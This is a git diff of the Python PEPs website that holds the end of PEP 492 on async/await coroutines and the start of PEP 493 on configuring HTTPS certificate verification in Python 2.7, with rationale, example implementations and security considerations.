  • sys.get_coroutine_wrapper() returns the current wrapper object. +Returns None if no wrapper was set. The function is +thread-specific. See Debugging Features for more details.
  • +
+
+
+

New Abstract Base Classes

+

In order to allow better integration with existing frameworks (such as +Tornado, see [13]) and compilers (such as Cython, see [16]), two new +Abstract Base Classes (ABC) are added:

+
    +
  • collections.abc.Awaitable ABC for Future-like classes, that +implement __await__ method.
  • +
  • collections.abc.Coroutine ABC for coroutine objects, that +implement send(value), throw(type, exc, tb), close() and +__await__() methods.

    Note that generator-based coroutines with CO_ITERABLE_COROUTINE +flag do not implement __await__ method, and therefore are not +instances of collections.abc.Coroutine and +collections.abc.Awaitable ABCs:

    +
    @types.coroutine
    +def gencoro():
    +    yield
    +
    +assert not isinstance(gencoro(), collections.abc.Coroutine)
    +
    +# however:
    +assert inspect.isawaitable(gencoro())
    +
    +
    +
  • +
+

To allow easy testing if objects support asynchronous iteration, two +more ABCs are added:

+
    +
  • collections.abc.AsyncIterable – tests for __aiter__ method.
  • +
  • collections.abc.AsyncIterator – tests for __aiter__ and +__anext__ methods.
  • +
+
+
+
+

Glossary

+
+
Native coroutine function
A coroutine function is declared with async def. It uses +await and return value; see New Coroutine Declaration +Syntax for details.
+
Native coroutine
Returned from a native coroutine function. See Await Expression +for details.
+
Generator-based coroutine function
Coroutines based on generator syntax. Most common example are +functions decorated with @asyncio.coroutine.
+
Generator-based coroutine
Returned from a generator-based coroutine function.
+
Coroutine
Either native coroutine or generator-based coroutine.
+
Coroutine object
Either native coroutine object or generator-based coroutine +object.
+
Future-like object
An object with an __await__ method, or a C object with +tp_as_async->am_await function, returning an iterator. Can be +consumed by an await expression in a coroutine. A coroutine +waiting for a Future-like object is suspended until the Future-like +object’s __await__ completes, and returns the result. See +Await Expression for details.
+
Awaitable
A Future-like object or a coroutine object. See Await +Expression for details.
+
Asynchronous context manager
An asynchronous context manager has __aenter__ and __aexit__ +methods and can be used with async with. See Asynchronous +Context Managers and “async with” for details.
+
Asynchronous iterable
An object with an __aiter__ method, which must return an +asynchronous iterator object. Can be used with async for. +See Asynchronous Iterators and “async for” for details.
+
Asynchronous iterator
An asynchronous iterator has an __anext__ method. See +Asynchronous Iterators and “async for” for details.
+
+
+
+

Transition Plan

+

To avoid backwards compatibility issues with async and await +keywords, it was decided to modify tokenizer.c in such a way, that +it:

+
    +
  • recognizes async def NAME tokens combination;
  • +
  • while tokenizing async def block, it replaces 'async' +NAME token with ASYNC, and 'await' NAME token with +AWAIT;
  • +
  • while tokenizing def block, it yields 'async' and 'await' +NAME tokens as is.
  • +
+

This approach allows for seamless combination of new syntax features +(all of them available only in async functions) with any existing +code.

+

An example of having “async def” and “async” attribute in one piece of +code:

+
class Spam:
+    async = 42
+
+async def ham():
+    print(getattr(Spam, 'async'))
+
+# The coroutine can be executed and will print '42'
+
+
+
+

Backwards Compatibility

+

This proposal preserves 100% backwards compatibility.

+
+

asyncio

+

asyncio module was adapted and tested to work with coroutines and +new statements. Backwards compatibility is 100% preserved, i.e. all +existing code will work as-is.

+

The required changes are mainly:

+
    +
  1. Modify @asyncio.coroutine decorator to use new +types.coroutine() function.
  2. +
  3. Add __await__ = __iter__ line to asyncio.Future class.
  4. +
  5. Add ensure_future() as an alias for async() function. +Deprecate async() function.
  6. +
+
+
+

asyncio migration strategy

+

Because plain generators cannot yield from native coroutine +objects (see Differences from generators section for more details), +it is advised to make sure that all generator-based coroutines are +decorated with @asyncio.coroutine before starting to use the new +syntax.

+
+
+

async/await in CPython code base

+

There is no use of await names in CPython.

+

async is mostly used by asyncio. We are addressing this by +renaming async() function to ensure_future() (see asyncio +section for details).

+

Another use of async keyword is in Lib/xml/dom/xmlbuilder.py, +to define an async = False attribute for DocumentLS class. +There is no documentation or tests for it, it is not used anywhere else +in CPython. It is replaced with a getter, that raises a +DeprecationWarning, advising to use async_ attribute instead. +‘async’ attribute is not documented and is not used in CPython code +base.

+
+
+
+

Grammar Updates

+

Grammar changes are fairly minimal:

+
decorated: decorators (classdef | funcdef | async_funcdef)
+async_funcdef: ASYNC funcdef
+
+compound_stmt: (if_stmt | while_stmt | for_stmt | try_stmt | with_stmt
+                | funcdef | classdef | decorated | async_stmt)
+
+async_stmt: ASYNC (funcdef | with_stmt | for_stmt)
+
+power: atom_expr ['**' factor]
+atom_expr: [AWAIT] atom trailer*
+
+
+
+
+

Deprecation Plans

+

async and await names will be softly deprecated in CPython 3.5 +and 3.6. In 3.7 we will transform them to proper keywords. Making +async and await proper keywords before 3.7 might make it harder +for people to port their code to Python 3.

+
+
+
+

Design Considerations

+
+

PEP 3152

+

PEP 3152 by Gregory Ewing proposes a different mechanism for coroutines +(called “cofunctions”). Some key points:

+
    +
  1. A new keyword codef to declare a cofunction. Cofunction is +always a generator, even if there is no cocall expressions +inside it. Maps to async def in this proposal.
  2. +
  3. A new keyword cocall to call a cofunction. Can only be used +inside a cofunction. Maps to await in this proposal (with +some differences, see below).
  4. +
  5. It is not possible to call a cofunction without a cocall +keyword.
  6. +
  7. cocall grammatically requires parentheses after it:
    atom: cocall | <existing alternatives for atom>
    +cocall: 'cocall' atom cotrailer* '(' [arglist] ')'
    +cotrailer: '[' subscriptlist ']' | '.' NAME
    +
    +
    +
  8. +
  9. cocall f(*args, **kwds) is semantically equivalent to +yield from f.__cocall__(*args, **kwds).
  10. +
+

Differences from this proposal:

+
    +
  1. There is no equivalent of __cocall__ in this PEP, which is +called and its result is passed to yield from in the cocall +expression. await keyword expects an awaitable object, +validates the type, and executes yield from on it. Although, +__await__ method is similar to __cocall__, but is only used +to define Future-like objects.
  2. +
  3. await is defined in almost the same way as yield from in the +grammar (it is later enforced that await can only be inside +async def). It is possible to simply write await future, +whereas cocall always requires parentheses.
  4. +
  5. To make asyncio work with PEP 3152 it would be required to modify +@asyncio.coroutine decorator to wrap all functions in an object +with a __cocall__ method, or to implement __cocall__ on +generators. To call cofunctions from existing generator-based +coroutines it would be required to use costart(cofunc, *args, +**kwargs) built-in.
  6. +
  7. Since it is impossible to call a cofunction without a cocall +keyword, it automatically prevents the common mistake of forgetting +to use yield from on generator-based coroutines. This proposal +addresses this problem with a different approach, see Debugging +Features.
  8. +
  9. A shortcoming of requiring a cocall keyword to call a coroutine +is that if is decided to implement coroutine-generators – +coroutines with yield or async yield expressions – we +wouldn’t need a cocall keyword to call them. So we’ll end up +having __cocall__ and no __call__ for regular coroutines, +and having __call__ and no __cocall__ for +coroutine-generators.
  10. +
  11. Requiring parentheses grammatically also introduces a whole lot +of new problems.

    The following code:

    +
    await fut
    +await function_returning_future()
    +await asyncio.gather(coro1(arg1, arg2), coro2(arg1, arg2))
    +
    +
    +

    would look like:

    +
    cocall fut()  # or cocall costart(fut)
    +cocall (function_returning_future())()
    +cocall asyncio.gather(costart(coro1, arg1, arg2),
    +                      costart(coro2, arg1, arg2))
    +
    +
    +
  12. +
  13. There are no equivalents of async for and async with in PEP +3152.
  14. +
+
+
+

Coroutine-generators

+

With async for keyword it is desirable to have a concept of a +coroutine-generator – a coroutine with yield and yield from +expressions. To avoid any ambiguity with regular generators, we would +likely require to have an async keyword before yield, and +async yield from would raise a StopAsyncIteration exception.

+

While it is possible to implement coroutine-generators, we believe that +they are out of scope of this proposal. It is an advanced concept that +should be carefully considered and balanced, with a non-trivial changes +in the implementation of current generator objects. This is a matter +for a separate PEP.

+
+
+

Why “async” and “await” keywords

+

async/await is not a new concept in programming languages:

+
    +
  • C# has it since long time ago [5];
  • +
  • proposal to add async/await in ECMAScript 7 [2]; +see also Traceur project [9];
  • +
  • Facebook’s Hack/HHVM [6];
  • +
  • Google’s Dart language [7];
  • +
  • Scala [8];
  • +
  • proposal to add async/await to C++ [10];
  • +
  • and many other less popular languages.
  • +
+

This is a huge benefit, as some users already have experience with +async/await, and because it makes working with many languages in one +project easier (Python with ECMAScript 7 for instance).

+
+
+

Why “__aiter__” does not return an awaitable

+

PEP 492 was accepted in CPython 3.5.0 with __aiter__ defined as +a method, that was expected to return an awaitable resolving to an +asynchronous iterator.

+

In 3.5.2 (as PEP 492 was accepted on a provisional basis) the +__aiter__ protocol was updated to return asynchronous iterators +directly.

+

The motivation behind this change is to make it possible to +implement asynchronous generators in Python. See [19] and [20] for +more details.

+
+
+

Importance of “async” keyword

+

While it is possible to just implement await expression and treat +all functions with at least one await as coroutines, this approach +makes APIs design, code refactoring and its long time support harder.

+

Let’s pretend that Python only has await keyword:

+
def useful():
+    ...
+    await log(...)
+    ...
+
+def important():
+    await useful()
+
+
+

If useful() function is refactored and someone removes all +await expressions from it, it would become a regular python +function, and all code that depends on it, including important() +would be broken. To mitigate this issue a decorator similar to +@asyncio.coroutine has to be introduced.

+
+
+

Why “async def”

+

For some people bare async name(): pass syntax might look more +appealing than async def name(): pass. It is certainly easier to +type. But on the other hand, it breaks the symmetry between async +def, async with and async for, where async is a modifier, +stating that the statement is asynchronous. It is also more consistent +with the existing grammar.

+
+
+

Why not “await for” and “await with”

+

async is an adjective, and hence it is a better choice for a +statement qualifier keyword. await for/with would imply that +something is awaiting for a completion of a for or with +statement.

+
+
+

Why “async def” and not “def async”

+

async keyword is a statement qualifier. A good analogy to it are +“static”, “public”, “unsafe” keywords from other languages. “async +for” is an asynchronous “for” statement, “async with” is an +asynchronous “with” statement, “async def” is an asynchronous function.

+

Having “async” after the main statement keyword might introduce some +confusion, like “for async item in iterator” can be read as “for each +asynchronous item in iterator”.

+

Having async keyword before def, with and for also +makes the language grammar simpler. And “async def” better separates +coroutines from regular functions visually.

+
+
+

Why not a __future__ import

+

Transition Plan section explains how tokenizer is modified to treat +async and await as keywords only in async def blocks. +Hence async def fills the role that a module level compiler +declaration like from __future__ import async_await would otherwise +fill.

+
+
+

Why magic methods start with “a”

+

New asynchronous magic methods __aiter__, __anext__, +__aenter__, and __aexit__ all start with the same prefix “a”. +An alternative proposal is to use “async” prefix, so that __anext__ +becomes __async_next__. However, to align new magic methods with +the existing ones, such as __radd__ and __iadd__ it was decided +to use a shorter version.

+
+
+

Why not reuse existing magic names

+

An alternative idea about new asynchronous iterators and context +managers was to reuse existing magic methods, by adding an async +keyword to their declarations:

+
class CM:
+    async def __enter__(self): # instead of __aenter__
+        ...
+
+
+

This approach has the following downsides:

+
    +
  • it would not be possible to create an object that works in both +with and async with statements;
  • +
  • it would break backwards compatibility, as nothing prohibits from +returning a Future-like objects from __enter__ and/or +__exit__ in Python <= 3.4;
  • +
  • one of the main points of this proposal is to make native coroutines +as simple and foolproof as possible, hence the clear separation of +the protocols.
  • +
+
+
+

Why not reuse existing “for” and “with” statements

+

The vision behind existing generator-based coroutines and this proposal +is to make it easy for users to see where the code might be suspended. +Making existing “for” and “with” statements to recognize asynchronous +iterators and context managers will inevitably create implicit suspend +points, making it harder to reason about the code.

+
+
+

Comprehensions

+

Syntax for asynchronous comprehensions could be provided, but this +construct is outside of the scope of this PEP.

+
+
+

Async lambda functions

+

Syntax for asynchronous lambda functions could be provided, but this +construct is outside of the scope of this PEP.

+
+
+
+

Performance

+
+

Overall Impact

+

This proposal introduces no observable performance impact. Here is an +output of python’s official set of benchmarks [4]:

+
python perf.py -r -b default ../cpython/python.exe ../cpython-aw/python.exe
+
+[skipped]
+
+Report on Darwin ysmac 14.3.0 Darwin Kernel Version 14.3.0:
+Mon Mar 23 11:59:05 PDT 2015; root:xnu-2782.20.48~5/RELEASE_X86_64
+x86_64 i386
+
+Total CPU cores: 8
+
+### etree_iterparse ###
+Min: 0.365359 -> 0.349168: 1.05x faster
+Avg: 0.396924 -> 0.379735: 1.05x faster
+Significant (t=9.71)
+Stddev: 0.01225 -> 0.01277: 1.0423x larger
+
+The following not significant results are hidden, use -v to show them:
+django_v2, 2to3, etree_generate, etree_parse, etree_process, fastpickle,
+fastunpickle, json_dump_v2, json_load, nbody, regex_v8, tornado_http.
+
+
+
+
+

Tokenizer modifications

+

There is no observable slowdown of parsing python files with the +modified tokenizer: parsing of one 12Mb file +(Lib/test/test_binop.py repeated 1000 times) takes the same amount +of time.

+
+
+

async/await

+

The following micro-benchmark was used to determine performance +difference between “async” functions and generators:

+
import sys
+import time
+
+def binary(n):
+    if n <= 0:
+        return 1
+    l = yield from binary(n - 1)
+    r = yield from binary(n - 1)
+    return l + 1 + r
+
+async def abinary(n):
+    if n <= 0:
+        return 1
+    l = await abinary(n - 1)
+    r = await abinary(n - 1)
+    return l + 1 + r
+
+def timeit(func, depth, repeat):
+    t0 = time.time()
+    for _ in range(repeat):
+        o = func(depth)
+        try:
+            while True:
+                o.send(None)
+        except StopIteration:
+            pass
+    t1 = time.time()
+    print('{}({}) * {}: total {:.3f}s'.format(
+        func.__name__, depth, repeat, t1-t0))
+
+
+

The result is that there is no observable performance difference:

+
binary(19) * 30: total 53.321s
+abinary(19) * 30: total 55.073s
+
+binary(19) * 30: total 53.361s
+abinary(19) * 30: total 51.360s
+
+binary(19) * 30: total 49.438s
+abinary(19) * 30: total 51.047s
+
+
+

Note that depth of 19 means 1,048,575 calls.

+
+
+
+

Reference Implementation

+

The reference implementation can be found here: [3].

+
+

List of high-level changes and new protocols

+
    +
  1. New syntax for defining coroutines: async def and new await +keyword.
  2. +
  3. New __await__ method for Future-like objects, and new +tp_as_async.am_await slot in PyTypeObject.
  4. +
  5. New syntax for asynchronous context managers: async with. And +associated protocol with __aenter__ and __aexit__ methods.
  6. +
  7. New syntax for asynchronous iteration: async for. And +associated protocol with __aiter__, __aexit__ and new built-in +exception StopAsyncIteration. New tp_as_async.am_aiter +and tp_as_async.am_anext slots in PyTypeObject.
  8. +
  9. New AST nodes: AsyncFunctionDef, AsyncFor, AsyncWith, +Await.
  10. +
  11. New functions: sys.set_coroutine_wrapper(callback), +sys.get_coroutine_wrapper(), types.coroutine(gen), +inspect.iscoroutinefunction(func), inspect.iscoroutine(obj), +inspect.isawaitable(obj), inspect.getcoroutinestate(coro), +and inspect.getcoroutinelocals(coro).
  12. +
  13. New CO_COROUTINE and CO_ITERABLE_COROUTINE bit flags for code +objects.
  14. +
  15. New ABCs: collections.abc.Awaitable, +collections.abc.Coroutine, collections.abc.AsyncIterable, and +collections.abc.AsyncIterator.
  16. +
  17. C API changes: new PyCoro_Type (exposed to Python as +types.CoroutineType) and PyCoroObject. +PyCoro_CheckExact(*o) to test if o is a native coroutine.
  18. +
+

While the list of changes and new things is not short, it is important +to understand, that most users will not use these features directly. +It is intended to be used in frameworks and libraries to provide users +with convenient to use and unambiguous APIs with async def, +await, async for and async with syntax.

+
+
+

Working example

+

All concepts proposed in this PEP are implemented [3] and can be +tested.

+
import asyncio
+
+async def echo_server():
+    print('Serving on localhost:8000')
+    await asyncio.start_server(handle_connection,
+                               'localhost', 8000)
+
+async def handle_connection(reader, writer):
+    print('New connection...')
+
+    while True:
+        data = await reader.read(8192)
+
+        if not data:
+            break
+
+        print('Sending {:.10}... back'.format(repr(data)))
+        writer.write(data)
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(echo_server())
+try:
+    loop.run_forever()
+finally:
+    loop.close()
+
+
+
+
+
+

Acceptance

+

PEP 492 was accepted by Guido, Tuesday, May 5, 2015 [14].

+
+
+

Implementation

+

The implementation is tracked in issue 24017 [15]. It was +committed on May 11, 2015.

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Victor Stinner, Elvis Pranskevichus, Andrew +Svetlov, Łukasz Langa, Greg Ewing, Stephen J. Turnbull, Jim J. Jewett, +Brett Cannon, Alyssa Coghlan, Steven D’Aprano, Paul Moore, Nathaniel +Smith, Ethan Furman, Stefan Behnel, Paul Sokolovsky, Victor Petrovykh, +and many others for their feedback, ideas, edits, criticism, code +reviews, and discussions around this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0492.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0493/index.html b/pep-0493/index.html new file mode 100644 index 00000000000..5ed4d87f570 --- /dev/null +++ b/pep-0493/index.html @@ -0,0 +1,726 @@ + + + + + + + + PEP 493 – HTTPS verification migration tools for Python 2.7 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 493 – HTTPS verification migration tools for Python 2.7

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Robert Kuska <rkuska at redhat.com>, +Marc-André Lemburg <mal at lemburg.com>
+
BDFL-Delegate:
+
Barry Warsaw
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-May-2015
+
Python-Version:
+
2.7.12
+
Post-History:
+
06-Jul-2015, 11-Nov-2015, 24-Nov-2015, 24-Feb-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 476 updated Python’s default handling of HTTPS certificates in client +modules to align with certificate handling in web browsers, by validating +that the certificates received belonged to the server the client was attempting +to contact. The Python 2.7 long term maintenance series was judged to be in +scope for this change, with the new behaviour introduced in the Python 2.7.9 +maintenance release.

+

This has created a non-trivial barrier to adoption for affected Python 2.7 +maintenance releases, so this PEP proposes additional Python 2.7 specific +features that allow system administrators and other users to more easily +decouple the decision to verify server certificates in HTTPS client modules +from the decision to update to newer Python 2.7 maintenance releases.

+
+
+

Rationale

+

PEP 476 changed Python’s default behaviour to align with expectations +established by web browsers in regards to the semantics of HTTPS URLs: +starting with Python 2.7.9 and 3.4.3, HTTPS clients in the standard library +validate server certificates by default.

+

However, it is also the case that this change does cause problems for +infrastructure administrators operating private intranets that rely on +self-signed certificates, or otherwise encounter problems with the new default +certificate verification settings.

+

To manage these kinds of situations, web browsers provide users with “click +through” warnings that allow the user to add the server’s certificate to the +browser’s certificate store. Network client tools like curl and wget +offer options to switch off certificate checking entirely (by way of +curl --insecure and wget --no-check-certificate, respectively).

+

At a different layer of the technology stack, Linux security modules like +SELinux and AppArmor, while enabled by default by distribution vendors, +offer relatively straightforward mechanisms for turning them off.

+

At the moment, no such convenient mechanisms exist to disable Python’s +default certificate checking for a whole process.

+

PEP 476 did attempt to address this question, by covering how to revert to the +old settings process wide by monkeypatching the ssl module to restore the +old behaviour. Unfortunately, the sitecustomize.py based technique proposed +to allow system administrators to disable the feature by default in their +Standard Operating Environment definition has been determined to be +insufficient in at least some cases. The specific case that led to the +initial creation of this PEP is the one where a Linux distributor aims to +provide their users with a +smoother migration path +than the standard one provided by consuming upstream CPython 2.7 releases +directly, but other potential challenges have also been pointed out with +updating embedded Python runtimes and other user level installations of Python.

+

Rather than allowing a plethora of mutually incompatible migration techniques +to bloom, this PEP proposes an additional feature to be added to Python 2.7.12 +to make it easier to revert a process to the past behaviour of skipping +certificate validation in HTTPS client modules. It also provides additional +recommendations to redistributors backporting these features to versions of +Python prior to Python 2.7.9.

+
+

Alternatives

+

In the absence of clear upstream guidance and recommendations, commercial +redistributors will still make their own design decisions in the interests of +their customers. The main approaches available are:

+
    +
  • Continuing to rebase on new Python 2.7.x releases, while providing no +additional assistance beyond the mechanisms defined in PEP 476 in migrating +from unchecked to checked hostnames in standard library HTTPS clients
  • +
  • Gating availability of the changes in default handling of HTTPS connections +on upgrading from Python 2 to Python 3
  • +
  • For Linux distribution vendors, gating availability of the changes in default +handling of HTTPS connections on upgrading to a new operating system version
  • +
  • Implementing one or both of the backport suggestions described in this PEP, +regardless of the formal status of the PEP
  • +
+
+
+
+

Scope Limitations

+

These changes are being proposed purely as tools for helping to manage the +transition to the new default certificate handling behaviour in the context +of Python 2.7. They are not being proposed as new features for Python 3, as +it is expected that the vast majority of client applications affected by this +problem without the ability to update the application itself will be Python 2 +applications.

+

It would likely be desirable for a future version of Python 3 to allow the +default certificate handling for secure protocols to be configurable on a +per-protocol basis, but that question is beyond the scope of this PEP.

+
+
+

Requirements for capability detection

+

As the proposals in this PEP aim to facilitate backports to earlier Python +versions, the Python version number cannot be used as a reliable means for +detecting them. Instead, they are designed to allow the presence +or absence of the feature to be determined using the following technique:

+
python -c "import ssl; ssl.<_relevant_attribute>"
+
+
+

This will fail with AttributeError (and hence a non-zero return code) if +the relevant capability is not available.

+

The feature detection attributes defined by this PEP are:

+
    +
  • ssl._https_verify_certificates: runtime configuration API
  • +
  • ssl._https_verify_envvar: environment based configuration
  • +
  • ssl._cert_verification_config: file based configuration (PEP 476 opt-in)
  • +
+

The marker attributes are prefixed with an underscore to indicate the +implementation dependent and security sensitive nature of these capabilities.

+
+
+

Feature: Configuration API

+

This change is proposed for inclusion in CPython 2.7.12 and later CPython 2.7.x +releases. It consists of a new ssl._https_verify_certificates() to specify +the default handling of HTTPS certificates in standard library client libraries.

+

It is not proposed to forward port this change to Python 3, so Python 3 +applications that need to support skipping certificate verification will still +need to define their own suitable security context.

+
+

Feature detection

+

The marker attribute on the ssl module related to this feature is the +ssl._https_verify_certificates function itself.

+
+
+

Specification

+

The ssl._https_verify_certificates function will work as follows:

+
def _https_verify_certificates(enable=True):
+    """Verify server HTTPS certificates by default?"""
+    global _create_default_https_context
+    if enable:
+        _create_default_https_context = create_default_context
+    else:
+        _create_default_https_context = _create_unverified_context
+
+
+

If called without arguments, or with enable set to a true value, then +standard library client modules will subsequently verify HTTPS certificates by default, otherwise they will skip verification.

+

If called with enable set to a false value, then standard library client +modules will subsequently skip verifying HTTPS certificates by default.

+
+
+

Security Considerations

+

The inclusion of this feature will allow security sensitive applications to +include the following forward-compatible snippet in their code:

+
if hasattr(ssl, "_https_verify_certificates"):
+    ssl._https_verify_certificates()
+
+
+

Some developers may also choose to opt out of certificate checking using +ssl._https_verify_certificates(enable=False). This doesn’t introduce any +major new security concerns, as monkeypatching the affected internal APIs was +already possible.

+
+
+
+

Feature: environment based configuration

+

This change is proposed for inclusion in CPython 2.7.12 and later CPython 2.7.x +releases. It consists of a new PYTHONHTTPSVERIFY environment variable that +can be set to '0' to disable the default verification without modifying the +application source code (which may not even be available in cases of +bytecode-only application distribution)

+

It is not proposed to forward port this change to Python 3, so Python 3 +applications that need to support skipping certificate verification will still +need to define their own suitable security context.

+
+

Feature detection

+

The marker attribute on the ssl module related to this feature is:

+
    +
  • the ssl._https_verify_envvar attribute, giving the name of environment +variable affecting the default behaviour
  • +
+

This not only makes it straightforward to detect the presence (or absence) of +the capability, it also makes it possible to programmatically determine the +relevant environment variable name.

+
+
+

Specification

+

Rather than always defaulting to the use of ssl.create_default_context, +the ssl module will be modified to:

+
    +
  • read the PYTHONHTTPSVERIFY environment variable when the module is first +imported into a Python process
  • +
  • set the ssl._create_default_https_context function to be an alias for +ssl._create_unverified_context if this environment variable is present +and set to '0'
  • +
  • otherwise, set the ssl._create_default_https_context function to be an +alias for ssl.create_default_context as usual
  • +
+
+
+

Example implementation

+
_https_verify_envvar = 'PYTHONHTTPSVERIFY'
+
+def _get_https_context_factory():
+    if not sys.flags.ignore_environment:
+        config_setting = os.environ.get(_https_verify_envvar)
+        if config_setting == '0':
+            return _create_unverified_context
+    return create_default_context
+
+_create_default_https_context = _get_https_context_factory()
+
+
+
+
+

Security Considerations

+

Relative to the behaviour in Python 3.4.3+ and Python 2.7.9->2.7.11, this +approach does introduce a new downgrade attack against the default security +settings that potentially allows a sufficiently determined attacker to revert +Python to the default behaviour used in CPython 2.7.8 and earlier releases.

+

This slight increase in the available attack surface is a key reason why:

+
    +
  • security sensitive applications should still define their own SSL context
  • +
  • the migration features described in this PEP are not being added to Python 3
  • +
+

However, it’s also worth keeping in mind that carrying out such an attack +requires the ability to modify the execution environment of a Python process +prior to the import of the ssl module. In combination with the ability +to write to any part of the filesystem (such as /tmp), any attacker with +such access would already be able to modify the behaviour of the underlying +OpenSSL implementation, the dynamic library loader, and other potentially +security sensitive components.

+
+
+

Interaction with Python virtual environments

+

The default setting is read directly from the process environment, and hence +works the same way regardless of whether or not the interpreter is being run +inside an activated Python virtual environment.

+
+
+
+

Reference Implementation

+

A patch for Python 2.7 implementing the above two features is attached to +the relevant tracker issue.

+
+
+

Backporting this PEP to earlier Python versions

+

If this PEP is accepted, then commercial Python redistributors may choose to +backport the per-process configuration mechanisms defined in this PEP to base +versions older than Python 2.7.9, without also backporting PEP 476’s change +to the default behaviour of the overall Python installation.

+

Such a backport would differ from the mechanism proposed in this PEP solely in +the default behaviour when PYTHONHTTPSVERIFY was not set at all: it would +continue to default to skipping certificate validation.

+

In this case, if the PYTHONHTTPSVERIFY environment variable is defined, and +set to anything other than '0', then HTTPS certificate verification +should be enabled.

+
+

Feature detection

+

There’s no specific attribute indicating that this situation applies. Rather, +it is indicated by the ssl._https_verify_certificates and +ssl._https_verify_envvar attributes being present in a Python version that +is nominally older than Python 2.7.12.

+
+
+

Specification

+

Implementing this backport involves backporting the changes in PEP 466, 476 and +this PEP, with the following change to the handling of the +PYTHONHTTPSVERIFY environment variable in the ssl module:

+
    +
  • read the PYTHONHTTPSVERIFY environment variable when the module is first +imported into a Python process
  • +
  • set the ssl._create_default_https_context function to be an alias for +ssl.create_default_context if this environment variable is present +and set to any value other than '0'
  • +
  • otherwise, set the ssl._create_default_https_context function to be an +alias for ssl._create_unverified_context
  • +
+
+
+

Example implementation

+
_https_verify_envvar = 'PYTHONHTTPSVERIFY'
+
+def _get_https_context_factory():
+    if not sys.flags.ignore_environment:
+        config_setting = os.environ.get(_https_verify_envvar)
+        if config_setting != '0':
+            return create_default_context
+    return _create_unverified_context
+
+_create_default_https_context = _get_https_context_factory()
+
+def _disable_https_default_verification():
+    """Skip verification of HTTPS certificates by default"""
+    global _create_default_https_context
+    _create_default_https_context = _create_unverified_context
+
+
+
+
+

Security Considerations

+

This change would be a strict security upgrade for any Python version that +currently defaults to skipping certificate validation in standard library +HTTPS clients. The technical trade-offs to be taken into account relate largely +to the magnitude of the PEP 466 backport also required rather than to anything +security related.

+
+
+

Interaction with Python virtual environments

+

The default setting is read directly from the process environment, and hence +works the same way regardless of whether or not the interpreter is being run +inside an activated Python virtual environment.

+
+
+
+

Backporting PEP 476 to earlier Python versions

+

The backporting approach described above leaves the default HTTPS certificate +verification behaviour of a Python 2.7 installation unmodified: verifying +certificates still needs to be opted into on a per-connection or per-process +basis.

+

To allow the default behaviour of the entire installation to be modified +without breaking backwards compatibility, Red Hat designed a configuration +mechanism for the system Python 2.7 installation in Red Hat Enterprise Linux +7.2+ that provides:

+
    +
  • an opt-in model that allows the decision to enable HTTPS certificate +verification to be made independently of the decision to upgrade to the +operating system version where the feature was first backported
  • +
  • the ability for system administrators to set the default behaviour of Python +applications and scripts run directly in the system Python installation
  • +
  • the ability for the redistributor to consider changing the default behaviour +of new installations at some point in the future without impacting existing +installations that have been explicitly configured to skip verifying HTTPS +certificates by default
  • +
+

As it only affects backports to earlier releases of Python 2.7, this change is +not proposed for inclusion in upstream CPython, but rather is offered as +a recommendation to other redistributors that choose to offer a similar feature +to their users.

+

This PEP doesn’t take a position on whether or not this particular change is a +good idea - rather, it suggests that if a redistributor chooses to go down +the path of making the default behaviour configurable in a version of Python +older than Python 2.7.9, then maintaining a consistent approach across +redistributors would be beneficial for users.

+

However, this approach SHOULD NOT be used for any Python installation that +advertises itself as providing Python 2.7.9 or later, as most Python users +will have the reasonable expectation that all such environments will verify +HTTPS certificates by default.

+
+

Feature detection

+

The marker attribute on the ssl module related to this feature is:

+
_cert_verification_config = '<path to configuration file>'
+
+
+

This not only makes it straightforward to detect the presence (or absence) of +the capability, it also makes it possible to programmatically determine the +relevant configuration file name.

+
+ + + +
+

Example implementation

+
_cert_verification_config = '/etc/python/cert-verification.cfg'
+
+def _get_https_context_factory():
+    # Check for a system-wide override of the default behaviour
+    context_factories = {
+        'enable': create_default_context,
+        'disable': _create_unverified_context,
+        'platform_default': _create_unverified_context, # For now :)
+    }
+    import ConfigParser
+    config = ConfigParser.RawConfigParser()
+    config.read(_cert_verification_config)
+    try:
+        verify_mode = config.get('https', 'verify')
+    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
+        verify_mode = 'platform_default'
+    default_factory = context_factories.get('platform_default')
+    return context_factories.get(verify_mode, default_factory)
+
+_create_default_https_context = _get_https_context_factory()
+
+
+
+
+

Security Considerations

+

The specific recommendations for this backporting case are designed to work for +privileged, security sensitive processes, even those being run in the following +locked down configuration:

+
    +
  • run from a locked down administrator controlled directory rather than a normal +user directory (preventing sys.path[0] based privilege escalation attacks)
  • +
  • run using the -E switch (preventing PYTHON* environment variable based +privilege escalation attacks)
  • +
  • run using the -s switch (preventing user site directory based privilege +escalation attacks)
  • +
  • run using the -S switch (preventing sitecustomize based privilege +escalation attacks)
  • +
+

The intent is that the only reason HTTPS verification should be getting +turned off installation wide when using this approach is because:

+
    +
  • an end user is running a redistributor provided version of CPython rather +than running upstream CPython directly
  • +
  • that redistributor has decided to provide a smoother migration path to +verifying HTTPS certificates by default than that being provided by the +upstream project
  • +
  • either the redistributor or the local infrastructure administrator has +determined that it is appropriate to retain the default pre-2.7.9 behaviour +(at least for the time being)
  • +
+

Using an administrator controlled configuration file rather than an environment +variable has the essential feature of providing a smoother migration path, even +for applications being run with the -E switch.

+
+
+

Interaction with Python virtual environments

+

This setting is scoped by the interpreter installation and affects all Python +processes using that interpreter, regardless of whether or not the interpreter +is being run inside an activated Python virtual environment.

+
+
+

Origins of this recommendation

+

This recommendation is based on the backporting approach adopted for Red Hat +Enterprise Linux 7.2, as published in the original July 2015 draft of this PEP +and described in detail in this KnowledgeBase article. Red Hat’s patches implementing +this backport for Python 2.7.5 can be found in the CentOS git repository.

+
+
+
+

Recommendation for combined feature backports

+

